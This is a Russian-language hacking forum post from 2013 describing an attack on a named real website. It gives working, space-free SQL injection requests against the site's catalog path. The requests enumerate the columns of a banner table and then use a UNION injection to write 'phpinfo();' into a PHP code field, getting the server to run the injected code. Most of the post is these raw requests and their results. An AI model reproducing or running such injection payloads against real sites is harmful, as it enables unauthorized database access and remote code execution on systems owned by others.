Показать сообщение отдельно
Старый 09.01.2013, 17:18   #2618
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

вчера, пока изучал http://www.1md.ru/catalog/list/250'/
нашел имена колонок беспробельным методом от v1d0q (сам метод ("пробельный") вроде от Qwazar),
Код:
запрос для последней колонки:
GET /catalog/list/2501'and(1)=(select*from(select*from(fho_banners`a`)JOIN(fho_banners`b`)using(id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url))c)='1 HTTP/1.1
=> graph_down
=>
id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url,graph_down
учитывая, что имя колонки php_code очень многообещающе сегодня решил добить:

Код:
GET /catalog/list/(251-1)and(1=0)union(select(1),(select(group_concat(banformat))from(fho_banners)),3,4,5,7) HTTP/1.1
=> {graph,flash}
логично предполагая что при banformat='php' должен вызывать php, пробую:

Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
=>
phpinfo

Последний раз редактировалось DrakonHaSh; 09.01.2013 в 17:26..
DrakonHaSh вне форума   Ответить с цитированием